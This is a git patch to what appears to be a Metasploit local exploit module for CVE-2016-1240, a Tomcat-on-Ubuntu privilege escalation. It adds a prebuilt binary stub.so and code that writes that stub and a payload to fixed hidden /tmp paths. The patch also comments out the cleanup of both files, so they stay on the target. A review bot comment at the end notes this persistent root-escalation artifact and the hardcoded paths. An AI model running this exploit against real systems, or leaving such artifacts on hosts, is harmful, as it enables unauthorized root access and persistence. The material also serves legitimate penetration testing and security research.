From 34b1e66f9045c5cdf8d86278a0f32a67d19a14eb Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 18 Jan 2023 20:00:03 -0500 Subject: [PATCH] tomcat 8 priv esc on ubuntu prebuilt so file --- data/exploits/CVE-2016-1240/stub.so | Bin 0 -> 8320 bytes .../local/tomcat_ubuntu_log_init_priv_esc.rb | 26 ++++++++++++------ 2 files changed, 18 insertions(+), 8 deletions(-) create mode 100644 data/exploits/CVE-2016-1240/stub.so 
diff --git a/data/exploits/CVE-2016-1240/stub.so b/data/exploits/CVE-2016-1240/stub.so new file mode 100644 index 0000000000000000000000000000000000000000..48bacc039a4ff66311077b252b10d61864f0023b GIT binary patch literal 8320 zcmeHMU2Ggz6+Y{Y6T3;)ZkjZ1(ki1U5h>8g#)*SNakI8#XAF5Gr<$p&f^iHSSCrS=`U#trV9=j)zdb z9d&P;(MK4sqbE*5!?#CIwqA}sf9OKXt%;s>Z*_b#xrv4#`Fgx0{$ILbgkW>5o-le8 z4S02Q{qdcj{^hyP-}>Aq@Bhj4dy%()|F_7y&lMI>bjKEkdN8z`{t8;Cfi+8tm!VMQ1A$VZ4YO1S-arI^R8`!oyw+Mu!oR< zeQcoDc9QwzaH`-Y^8>w|>0CBB5Fbn@Jz22CPK?FLK|GzBK*i&uc0YUQOvej_WC4bg zZnBtiz)2UzGmsd`ozLQLCg(sgn@(jv3+dFLlQs)EvzfXH>Kz0->BQYQPI$0T@aBt9 z)`6ov$2vOgX0zFB@ovgn>NVieFw&6k&(k5~1?*BB4ZMomQuVaTuVJ4W$zMV$@0Ta9 zDa&QQkuaa*xGwU3BzTnZR(`I63xBJ@pyAZsMDLiiSsyNY1IgxmIJ;IR3qD-NAi<&! zze{O)KTSLz^1)k!5*R+*zd!Hs;r>@O>ccUBzNt1cJ6T$S(9(n zaezxLKSxn%_Z#@zup@>&;z!7Sezt^d_p8K*h`*`$mx-sT&d(_Rd&E=7=6|60t zbcs`)Zab~)TlziwC9;2gDQrzGSg+3=wnEpf-!8dL=}GtXZ4_jFr5`hnsH ztjV??qXAB7>bASVy43bIa&ujH3v(9!oVi{*i$Lh_)$^HJi{nflhT{79&!DC^Zyf(L zk3UZ?OE=HV$52XrYq}**xANwj2$bf2u~aHqQ?*|v^-EhOkz7S7lz#WjOmY9K)TK>` z?i}L*a}%ikTB%+E`w18)`{_2?3FmsLe`(7j%TCT*!^z<@r$;RB_g*)1Zm;=7Z}N1@ z=s@nVH0({fiM?ru-sf}qWI7jj&>4ibhaYZ2N)PuR|0$IYARWLNe;O%$o2Z2*`XMyd z7}~yJUEO6|6}u3lZ^2d6?<0jsV|S$Kc*FYhbx*_LZ4ZBN|E`?`lMda^0!~=%dF_$L zi#44a*Vbgw6KSlr)d;LcU^N1(5x7$XB)^e-Ms(=|O^tFXYQn$dv6yjsP4as_ww3c! 
zIUY(rwVm~4Yu?7Zk>&qp zzC2I%_x~nxZq~>B1P6SG=_u2SOeOC<+S&P0W6!C6WWI^N3D*fu`^{&FJ*TegWQ`JddpY=G=P(XcUi^8kd$%haRs^1(&+)!gw{ydI& zQ2l05`Kf-t=mZ<&=e*LduE#uucq2Y{y$*Ci=~vE$xUaFktP|1r)(ZMRLfjA~AN}PD z_+MA>^Do5J0n6uuy7%CRE2u67iM(5Ii$gD|H1Tn&)K#HsX2%bm82@-z-*GyjCLot~Y(C4H`axs%G7;G z-zntmk$Bdj;@FYXC)#_Db)p8=RP8Q{&8#E+2w@#f931U=w4=Spezd#$WY>T_(B9G0 zWpfQI7W3D&?pTWBx|mn9t1RcqNn91mRH04t>noHhU^?Sjsvaup<~_-1GG9pL zvK5StGORVkNs)W!(k_^4bQ8Pga1L2FIflO~hGsseDvf4xgxAZ6gHD9=OudEUSxEnh z1ghaM@k}a#bI7^m9uX>Anpm|26PIuXm!w!Pzja=hGG>?My9`XcTR)M#AN5qrsdV~CM&v6p;HsO0CUq8hss z7A)*ht}OPFmkHg;nlgXU6M72elzR(5!vPW+V|#u641M>A*KM zd&xtD$~jfs=;MD^vzL5YD6KDl)8qF;6h`op^(E(L`Tw7;uk$}c+XkP#Q&>;N5u1*kvW`9ODhz%deLuVlN2s^6m&mbc`o{mG?n<59nJX_b>ZD Sy`MqjM`^RecAw^4AOF84P#oX@ literal 0 HcmV?d00001 diff --git a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb index 71e7374713..5770d5d40d 100644 --- a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb +++ b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb 
@@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local
 )
 print_good("Original #{catalina} backed up to #{path}")
+ if live_compile?
+ # upload our privesc stub
+ so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
+ so_stub_path = "#{base_dir}/#{so_stub}"
+ payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+ # Upload exploit stub
+ vprint_status "Compiling exploit stub: #{so_stub_path}"
+ upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
+ else
+ payload_path = '/tmp/.jMeY5vToQl'
+ so_stub = '.ny9NyKEPJ.so'
+ so_stub_path = "/tmp/#{so_stub}"
+
+ write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
+ end
 
 # Upload payload executable
- payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
 vprint_status("Uploading Payload to #{payload_path}")
 upload_and_chmodx payload_path, generate_payload_exe
- register_file_for_cleanup(payload_path)
+ # register_file_for_cleanup(payload_path)
 
- # upload our privesc stub
- so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
- so_stub_path = "#{base_dir}/#{so_stub}"
- vprint_status "Compiling exploit stub: #{so_stub_path}"
- upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
- register_file_for_cleanup(so_stub_path)
+ # register_file_for_cleanup(so_stub_path)
 
 # delete the log and symlink ld.so.preload
 vprint_status("Deleting #{catalina}")
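Review bot: Both `register_file_for_cleanup` calls are turned into comments with no explanation, so the uploaded payload at `payload_path` and the preload stub stay on the target after the session ends; if the stub makes the `$BACKDOORPATH` binary setuid root (as the `privesc_preload.c` name suggests, though that source is not in this hunk), that is a persistent privilege-escalation artifact left on the host. If cleanup has to be deferred because the root-context trigger consumes these files later, state that next to the commented lines, e.g. `# Cleanup is deliberately not registered here: both files must survive until the root-triggered restart runs; they are removed after the trigger fires`, and make sure a later step actually removes them. The `else` branch also hard-codes `/tmp/.jMeY5vToQl` and `/tmp/.ny9NyKEPJ.so` and ignores `base_dir`; presumably the prebuilt `stub.so` has that payload path compiled in, so the coupling should be documented (`# path is baked into data/exploits/CVE-2016-1240/stub.so; rebuild the stub if it changes`), and the predictable names are a known-indicator and collision risk worth noting for operators. `write_file(so_stub_path, ...)` has its result ignored, so a failed upload in the prebuilt branch proceeds to the ld.so.preload step with no stub in place; `fail_with(Failure::Unknown, "Failed to write #{so_stub_path}") unless write_file(...)` would stop that. The enclosing `exploit` method starts and ends outside this hunk.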